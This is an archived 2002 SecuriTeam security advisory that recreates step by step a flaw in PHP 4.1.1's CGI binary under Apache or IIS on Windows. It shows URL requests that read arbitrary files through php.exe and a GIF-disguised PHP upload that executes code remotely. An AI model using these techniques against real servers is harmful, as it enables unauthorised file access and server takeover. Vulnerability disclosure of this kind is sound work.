[NT] Compromising IIS or Apache Servers Running PHP for Windows (Step-by-Step)

From: support@securiteam.com
Date: 02/26/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 26 Feb 2002 17:26:38 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Compromising IIS or Apache Servers Running PHP for Windows (Step-by-Step)
------------------------------------------------------------------------

SUMMARY

As we described in our earlier advisories:
<http://www.securiteam.com/windowsntfocus/5YP0L0U60C.html> Gaining Root
Access via PHP.exe,
<http://www.securiteam.com/windowsntfocus/5ZP030U60U.html> Security Risk
When Using the CGI Binary (PHP.EXE) Under Apache, it is possible to
compromise a host running only PHP and Apache or IIS under the Windows
Operating System. The following is a systematic recreation of the
vulnerability.

DETAILS

Vulnerable systems:
PHP version 4.1.1 under Apache 2.0.32 (Feb 16 2002 12:35:44)
PHP version 4.1.1 under IIS

Recreating the vulnerability:
1) Download apache for Windows. See:
http://httpd.apache.org/docs/windows.html
http://www.apache.org/dist/httpd/binaries/win32/
http://www.apache.org/dist/httpd/binaries/win32/apache_2.0.32-beta-win32-x86-no_ssl.msi

2) Install. We used the following installation procedure:
- Next->Accept Agreement->Next->Next->
somehat.com->Tab->www.somehat.com->Tab->webmaster@somehat.com->For all
users->Next
- Typical->Next
- C:\Program Files\Apache Group\->Next
- Finish.

3) Make sure Apache is running:
C:\> netstat -an | find "80"
  TCP 0.0.0.0:80 0.0.0.0:0 LISTENING

4) And via Internet Explorer, go to: http://localhost
If you can see this, the installation of the Apache web server software on
this system was successful. You may now add content to this directory and
replace this page.

5) Download PHP for Windows. See:
http://www.php.net/
http://www.php.net/downloads.php
http://www.php.net/do_download.php?download_file=php-4.1.1-installer.exe

6) We used the following installation procedure:
- Next->I Agree->Standard->Next
- c:\PHP->Next->Localhost->Tab->me@localhost.com->Next
- Apache->Next
- Ok->Ok

7) Modify the httpd.conf file (the procedure is taken from:
http://www.php.net/manual/en/install.windows.php
http://www.php.net/manual/en/install.apache.php)

- Open httpd.conf in Notepad

- After:
ScriptAlias /cgi-bin/ "C:/Program Files/Apache Group/Apache2/cgi-bin/"
Add:
ScriptAlias /php/ "c:/php/"

- After:
AddType application/x-tar .tgz
Add:
AddType application/x-httpd-php .php .phtml

- After:
# Format: Action handler-name /cgi-script/location
Add:
Action application/x-httpd-php "/php/php.exe"

8) Restart apache.

9) Check that everything is working:
Going to:
http://localhost/php/php.exe

Should return:
No input file specified.

10) Create a file in c:\ called hello.txt, and see if you can view that
file.
For example:
http://localhost/php/php.exe?c:\hello.txt

Should return the text inside that file:
Hello world.

This uses the <http://www.securiteam.com/windowsntfocus/5ZP030U60U.html>
Security Risk When Using the CGI Binary (PHP.EXE) Under Apache attack.

Basically, it also means that:
<http://www.securiteam.com/windowsntfocus/5YP0L0U60C.html> Gaining Root
Access via PHP.exe would work as well.

This would allow an attacker to gain complete control over the remote
server.

If this is not enough, let us say we have a PHP script that uploads its
files to a directory UNDER HTDOCS of Apache.
In our example to:
C:\Program Files\Apache Group\Apache2\htdocs\images

The attacker will upload an innocent looking file called:
smily.gif

Where the smily.gif file contains:
<? phpinfo(); ?>

Accessing:
http://localhost/php/php.exe?C:\Program%20Files\Apache%20Group\Apache2\htdocs\images\smily.gif

Returns:
PHP Version 4.1.1

This allows us to upload custom scripts and execute them remotely.

ADDITIONAL INFORMATION

The article has been assembled with the help of
<mailto:brereton_paul@btopenworld.com> Paul Brereton,
<mailto:dan.kuykendall@foundstone.com> Dan Kuykendall and the
<mailto:experts@securiteam.com> SecurITeam Experts.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages